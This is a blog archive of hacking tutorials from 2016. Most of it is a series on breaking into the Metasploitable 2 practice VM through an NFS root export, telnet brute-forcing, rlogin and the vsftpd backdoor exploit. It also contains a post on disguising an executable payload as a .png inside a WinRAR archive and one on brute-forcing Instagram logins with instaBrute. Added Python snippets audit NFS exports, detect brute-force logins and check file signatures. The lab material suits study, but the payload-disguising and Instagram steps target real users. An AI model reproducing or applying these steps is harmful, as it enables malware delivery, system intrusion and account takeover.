Friday, 29 July 2016

Intrusion into Metasploitable, part 3

In this post we are going to attack the NFS (Network File System) service.

This service lets files, CD-ROM/DVD drives and so on that are hosted on a server be shared remotely, making them available to any client.

The default port is 2049, and it can run over TCP or UDP.

The RFCs for this service are 1094, 1813 and 3530 (versions 2, 3 and 4 respectively).

Let's show the scan again:

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Let's run the following:

rpcinfo 192.168.1.131

rpcinfo -p 192.168.1.131

Let's see which directory is being shared:

showmount -e 192.168.1.131

The exported directory is the root directory, /.
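A defender's check for the misconfiguration this section relies on, as an added example that is not part of the original post: it parses /etc/exports-style entries and flags a root export, a missing client restriction, no_root_squash, a writable share and the insecure option. The sample export lines are constructed for illustration (the option names are the real ones from exports(5)); the function and class names are mine.

```python
"""Audit /etc/exports-style entries for the misconfiguration used above:
a root export open to any host with root squashing disabled.

Added example, not from the original post. The sample lines are constructed
for illustration; the option names are the real ones from exports(5)."""
import re
from dataclasses import dataclass, field

# NFS server defaults when an option is not given: read-only, root_squash, secure.
DEFAULTS = {"ro": True, "root_squash": True, "secure": True}

CLIENT_RE = re.compile(r"(\S+?)(?:\((.*?)\))?$")  # host[(opt,opt,...)]


@dataclass
class Export:
    path: str
    client: str                 # "*" means any host
    options: dict = field(default_factory=dict)


def parse_options(opt_text: str) -> dict:
    """Normalise 'rw,no_root_squash,insecure' into the three flags we audit."""
    opts = dict(DEFAULTS)
    for raw in filter(None, opt_text.split(",")):
        name = raw.partition("=")[0]
        if name in ("rw", "ro"):
            opts["ro"] = name == "ro"
        elif name == "no_root_squash":
            opts["root_squash"] = False
        elif name in ("root_squash", "all_squash"):
            opts["root_squash"] = True
        elif name in ("secure", "insecure"):
            opts["secure"] = name == "secure"
    return opts


def parse_exports(text: str) -> list:
    """Parse exports(5) lines; a path with no client list is exported to all hosts."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:
            host, opt_text = CLIENT_RE.match(spec).groups()
            exports.append(Export(path, host, parse_options(opt_text or "")))
    return exports


def audit(export: Export) -> list:
    """Return the risk findings for one export entry (empty list = nothing flagged)."""
    findings = []
    if export.path == "/":
        findings.append("exports the whole root filesystem")
    if export.client in ("*", "0.0.0.0/0"):
        findings.append("no client restriction: any host may mount it")
    if not export.options["root_squash"]:
        findings.append("no_root_squash: a remote uid 0 is root on the share")
    if not export.options["ro"]:
        findings.append("writable")
    if not export.options["secure"]:
        findings.append("insecure: requests accepted from unprivileged ports")
    return findings


def audit_exports(text: str) -> dict:
    """Map 'path -> client' to its findings for every entry in the file."""
    return {f"{e.path} -> {e.client}": audit(e) for e in parse_exports(text)}


# Constructed sample. The first line is the kind of export that lets a client
# append an SSH key to the server's filesystem, as in the post above; the
# second is a sane one restricted to a subnet.
SAMPLE_EXPORTS = """
/           *(rw,sync,no_root_squash,no_subtree_check)
/srv/share  192.168.1.0/24(ro,sync,root_squash)
"""

if __name__ == "__main__":
    for entry, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(entry, "=>", "; ".join(findings) or "OK")
```

On the server side the same check can be run directly on /etc/exports, or on the output of `exportfs -v`, to find shares that need a client list or root_squash restored.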

Now we generate a new SSH key:

ssh-keygen

We create a temporary directory:

mkdir /tmp/ROOT (so there are no problems later on: right now I am working in the /root directory)

We mount the file system:

mount -t nfs 192.168.1.131:/ /tmp/ROOT/

In case you hadn't noticed, the slash after the colon that follows the IP address is the directory being shared with us.

We append the key we just created to the authorized_keys file on the remote share:

cat /root/.ssh/id_rsa.pub >> /tmp/ROOT/.ssh/authorized_keys

And we unmount:

umount /tmp/ROOT

A summary of what we have done:

We created a new SSH key pair and copied its public key onto the server's root directory, which is exported over NFS. This way we can open an SSH session without any trouble.




If we go into the home directory, we can see that there are 4 users: ftp, msfadmin, service and user.

On our machine we create a file called users with the following contents:

ftp
msfadmin
service
user

This will be our username dictionary.

And now, in Metasploit, we try to brute-force the passwords:

use auxiliary/scanner/telnet/telnet_login

And we configure it.

After quite a long time, the passwords come out:

msfadmin : msfadmin
user : user
service : service
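From the defender's side, a run like the one above leaves a trail: each rejected telnet password becomes a "FAILED LOGIN" record from login(1) in the server's auth log. As an added example that is not part of the original post, this parses such records and flags any source address that fails more than a threshold of logins inside a short window, reporting the set of usernames it tried. The log lines are constructed (hostnames and PIDs invented) and the exact wording of the message is an assumption about the target's login binary; the regex relies only on the stable fields.

```python
"""Detect the password-guessing pattern of the telnet_login run above in
auth.log-style records.

Added example, not from the original post. The log lines are constructed to
resemble the 'FAILED LOGIN' messages that Linux login(1) writes via syslog
when telnetd hands it a rejected password; hostnames and PIDs are invented,
and the regex relies only on the fields that are stable across versions."""
import re
from collections import defaultdict
from datetime import datetime

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ login\[\d+\]: "
    r"FAILED LOGIN \(\d+\) on '[^']*' from '(?P<src>[^']+)' FOR '(?P<user>[^']*)'"
)


def parse_failures(lines, year=2016):
    """Yield (timestamp, source_ip, username) for each failed-login record."""
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # successful logins, sshd, pam_unix and other noise
        # syslog timestamps carry no year; the caller supplies it.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["src"], m["user"]


def detect_bruteforce(lines, window_s=60, threshold=5):
    """Return {source_ip: (total_failures, sorted_usernames_tried)} for each
    source with at least `threshold` failures inside any `window_s` seconds.

    A dictionary attack like the one above shows up as many failures from one
    address in a short time, spread over several usernames."""
    per_src = defaultdict(list)
    for ts, src, user in parse_failures(lines):
        per_src[src].append((ts, user))

    alerts = {}
    for src, events in per_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits in window_s
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts[src] = (len(events), sorted({u for _, u in events}))
                break
    return alerts


# Constructed sample log: one address cycling through the users file from the
# post, one single stray failure, and two unrelated successful-login records.
SAMPLE_LOG = """\
Jul  1 12:01:03 metasploitable login[4821]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.1.134' FOR 'ftp', Authentication failure
Jul  1 12:01:05 metasploitable login[4823]: FAILED LOGIN (1) on '/dev/pts/2' from '192.168.1.134' FOR 'msfadmin', Authentication failure
Jul  1 12:01:08 metasploitable login[4825]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.1.134' FOR 'service', Authentication failure
Jul  1 12:01:11 metasploitable login[4827]: FAILED LOGIN (1) on '/dev/pts/3' from '192.168.1.134' FOR 'user', Authentication failure
Jul  1 12:01:14 metasploitable login[4829]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.1.134' FOR 'ftp', Authentication failure
Jul  1 12:01:17 metasploitable login[4831]: FAILED LOGIN (2) on '/dev/pts/1' from '192.168.1.134' FOR 'msfadmin', Authentication failure
Jul  1 12:05:40 metasploitable login[4902]: FAILED LOGIN (1) on '/dev/pts/1' from '192.168.1.50' FOR 'msfadmin', Authentication failure
Jul  1 12:05:52 metasploitable login[4902]: pam_unix(login:session): session opened for user msfadmin by LOGIN(uid=0)
Jul  1 12:06:10 metasploitable sshd[4950]: Accepted publickey for msfadmin from 192.168.1.10 port 51022 ssh2
"""

if __name__ == "__main__":
    for src, (count, users) in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {count} failed logins, users tried: {', '.join(users)}")
```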






Friday, 22 July 2016

Intrusion into Metasploitable, part 2

This time we are going to attack the Metasploitable 2 machine in our virtual lab.

We could repeat the exercise from the previous post on it; instead, we are going to do a different one.

The Metasploitable 2 credentials are user: msfadmin and password: msfadmin. With these credentials we can find out the machine's IP address so we can attack it.

In my case it will be 192.168.1.131.

It isn't strictly necessary, but I am going to run the scan again:

nmap -sS -v -A 192.168.1.131

Ports 512, 513 and 514 indicate that the UNIX r-commands can be run on the victim system. These commands include rcp, rlogin and rsh. We are going to use this attack vector.

We first need to install rsh-client:

apt-get install rsh-client

We run:

rlogin -l root 192.168.1.131

And we will be logged in as root.





Friday, 15 July 2016

Intrusion into Metasploitable, part 1

This time it's a full intrusion into a Linux server, with all the necessary steps. This will be a series of posts in which I'm sure we will learn a lot together.

We will use a distribution, Metasploitable 2, as the victim. This distribution exists so that you can practise your pentesting, and you can download it for free; alternatively, if you register at ctf365.com as I did, you can attack it in the cloud (just remember not to modify anything, out of respect for the other users).

First of all, we need to scan the services:

nmap -sS -v -A 192.168.1.131 -oN salida_nmap



We focus on this service:

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4

We open Metasploit with msfconsole.

We search for an exploit for vsftpd:

search vsftpd

Good, we have an exploit. Now we load it:

use exploit/unix/ftp/vsftpd_234_backdoor

and configure it:

set RHOST 192.168.1.131
set PAYLOAD cmd/unix/interact
set LHOST 192.168.1.134
set LPORT 4444
exploit

And now we have access.

We can run whatever Linux commands we want.

To exit, we press CTRL+C

and abort the session.






Friday, 8 July 2016

Hiding a payload in an image

We are going to hide our payloads by changing the extension, thanks to a WinRAR vulnerability.

First, we download and install an old version of WinRAR; I will do it with version 2.50.

We install it normally, as if we were on Windows.

It will detect the / directory as the Z: drive.

We select the payload we want to hide

and compress it.

We install hexedit:

apt-get install hexedit

We edit our compressed payload with hexedit:

hexedit manugomez1977.rar

In the right-hand pane we will see the payload's name, manugomez1977.exe; we change its extension to .png:

To move to the right-hand pane, press Tab.

CTRL+S to save.
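The countermeasure to this trick is to not trust the extension at all: a defender checks the first bytes of the extracted file against known signatures. As an added example that is not part of the original post, this compares a file's extension with the content signature it actually carries (PNG, PE executable, RAR) and flags a .png that is really an MZ/PE image; the sample bytes are constructed, not a real program, and the function names are mine.

```python
"""Spot a file whose extension disagrees with its content, the trick used above
to make manugomez1977.exe travel inside the archive under a .png name.

Added example, not from the original post. The sample bytes are constructed:
a minimal PE/MZ header and a bare PNG signature, neither a real program."""
import os
import struct


def is_png(data: bytes) -> bool:
    return data.startswith(b"\x89PNG\r\n\x1a\n")


def is_pe(data: bytes) -> bool:
    """True for a Windows PE image: 'MZ' DOS stub whose e_lfanew field (offset
    0x3C) points at the 'PE\\0\\0' signature. Checking both avoids flagging any
    file that merely starts with the letters MZ."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def is_rar(data: bytes) -> bool:
    return data.startswith(b"Rar!\x1a\x07")


# extension -> signature check. .exe and .dll share the PE check on purpose.
DETECTORS = {"png": is_png, "exe": is_pe, "dll": is_pe, "rar": is_rar}


def content_type(data: bytes):
    """Name of the first detector whose signature matches, else None."""
    for name, check in DETECTORS.items():
        if check(data):
            return name
    return None


def check_file(name: str, data: bytes) -> str:
    """Return 'ok', 'unknown' (no signature recognised) or a mismatch string
    such as 'mismatch: ext=png content=exe'."""
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    actual = content_type(data)
    if actual is None:
        return "unknown"
    # Compare detector functions, not names, so tool.dll with a PE body is fine.
    if DETECTORS.get(ext) is DETECTORS[actual]:
        return "ok"
    return f"mismatch: ext={ext or '(none)'} content={actual}"


def fake_pe() -> bytes:
    """Constructed minimal PE: 64-byte DOS header with e_lfanew = 0x40, then
    the PE signature. Not executable, just enough for the check above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


# Constructed sample set: the renamed payload from the post, a genuine-looking
# PNG header, an honest executable and a file with no known signature.
SAMPLE_FILES = {
    "manugomez1977.png": fake_pe(),
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "tool.exe": fake_pe(),
    "notes.txt": b"plain text",
}


def scan(files: dict) -> dict:
    """Classify every (name -> bytes) pair; in practice feed it extracted files."""
    return {name: check_file(name, data) for name, data in files.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES).items():
        print(f"{name:20} {verdict}")
```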





As you know, only do your testing at home; stay legal.

Happy Hacking !!!!!!!!!!!!!


Friday, 1 July 2016

Hacking Instagram

Warning: I take no responsibility for any misuse. I am posting this purely as information, and so you can see why you need to use complex passwords. PLEASE, DON'T DO IT!!!

We download instaBrute from https://github.com/chinoogawa/instaBrute

We unzip it and go into the directory.

We change the permissions so we can run it:

chmod +x instaBrute.py

It is used as follows:

python instaBrute.py -f diccionario_usuarios -d diccionario_contraseñas

or

python instaBrute.py -u usuario -d diccionario_contraseñas

If we get an error about selenium, we need to install it:

pip install -U selenium (only if selenium is not installed)